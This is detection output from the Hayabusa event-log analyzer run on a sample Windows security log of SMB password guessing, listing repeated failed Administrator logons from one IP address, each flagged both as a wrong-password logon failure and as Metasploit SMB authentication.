Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 